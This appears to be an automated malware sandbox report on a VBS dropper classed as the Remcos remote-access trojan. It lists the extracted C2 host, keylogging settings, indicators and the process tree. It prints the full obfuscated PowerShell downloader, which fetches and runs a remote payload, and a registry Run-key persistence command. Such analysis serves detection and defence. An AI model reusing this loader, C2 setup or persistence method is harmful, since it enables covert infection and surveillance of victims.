Overview

overview

10

Static

static

1

MPOL_74836...24.vbs

windows7-x64

6

MPOL_74836...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 10:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MPOL_74836582ZapytaniePotwierdzenie003424.vbs

  • Size

    7KB

  • MD5

    a74cf7fea2f317f537fadc3e2d34dee5

  • SHA1

    1df8410433bba83aa58596cd88a9c084a5a8e43a

  • SHA256

    c0d20c1324c32ec11ee40a892c6ae0b954f6972e19ce9e976bcf565091f12cdd

  • SHA512

    ea1505953b80b96b450bc0cda83a1c3bd3001f057a874bce22646cd7ade2b4ed8fe39cff208255cb84eb60a931a3d73164d7ab05f7fee795bbbae4f5b82caa68

  • SSDEEP

    192:8K9O+aSHwmoFMKNdYggfJtvK5I76yDP8Te:LaSHOFHNdYvu586dy

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

dumboi.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-8AXK3L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MPOL_74836582ZapytaniePotwierdzenie003424.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5104
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strandretter" /t REG_EXPAND_SZ /d "%Indifferentes% -windowstyle 1 $Fravnningerne=(gp -Path 'HKCU:\Software\Brugerfilers\').Udstillingslokaler;%Indifferentes% ($Fravnningerne)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strandretter" /t REG_EXPAND_SZ /d "%Indifferentes% -windowstyle 1 $Fravnningerne=(gp -Path 'HKCU:\Software\Brugerfilers\').Udstillingslokaler;%Indifferentes% ($Fravnningerne)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3016

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    161de1c8f61f4559129f01dfa307fc5e

    SHA1

    46103bbcfb1d1ed452fa5cca8a5fbb9a0018d2f1

    SHA256

    cb0a53b277faae27cb1f249ab28e6eb59a920f14401d8d3a34df20cbaea179c0

    SHA512

    be08bdeb2ac1b386383ad27b775c92dcb574484771e4ee118f044a96cb52d5e3c62ae81bdae6f21a2a6d0dc08fbb2aed7db940e1770eff5e7efb770e80346543

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d336b18e0e02e045650ac4f24c7ecaa7

    SHA1

    87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

    SHA256

    87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

    SHA512

    e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyrpyhcm.csq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Arkaiserings.Slg
    Filesize

    462KB

    MD5

    435e0cd415d69ecb8a08c76fc8e4cd22

    SHA1

    e837dcf180638cd11ab879d23345d25b20f3730b

    SHA256

    9d776efef1a9250cf4791c7ce6134e70efb65b3fb495f3be6d0427b13516bbb5

    SHA512

    1199e5f2690d42c2bd57913eaa3ea69703b0e4dc5d8999d59cf940c5ed4fe72daa0d1d5f45d28ed532edfb4a3330e38417cb46ebbfba4d8f6a299b022962e4bd

    Download Submit

  • memory/2384-42-0x00000000061B0000-0x00000000061CA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2384-44-0x0000000006E30000-0x0000000006E52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2384-47-0x0000000008660000-0x0000000009599000-memory.dmp

    Filesize

    15.2MB

    Download

  • memory/2384-45-0x00000000080B0000-0x0000000008654000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2384-43-0x0000000006EA0000-0x0000000006F36000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2384-41-0x0000000007480000-0x0000000007AFA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2384-40-0x0000000005C40000-0x0000000005C8C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2384-23-0x00000000022E0000-0x0000000002316000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2384-24-0x0000000004E90000-0x00000000054B8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2384-25-0x0000000004D30000-0x0000000004D52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2384-26-0x0000000004DD0000-0x0000000004E36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2384-27-0x0000000005530000-0x0000000005596000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2384-37-0x00000000055E0000-0x0000000005934000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2384-39-0x0000000005C10000-0x0000000005C2E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3240-12-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-22-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-19-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-0-0x00007FF8FC3C3000-0x00007FF8FC3C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3240-16-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-13-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-15-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-11-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-14-0x00007FF8FC3C3000-0x00007FF8FC3C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3240-1-0x0000021F8BC70000-0x0000021F8BC92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3752-56-0x0000000001000000-0x0000000002254000-memory.dmp

    Filesize

    18.3MB

    Download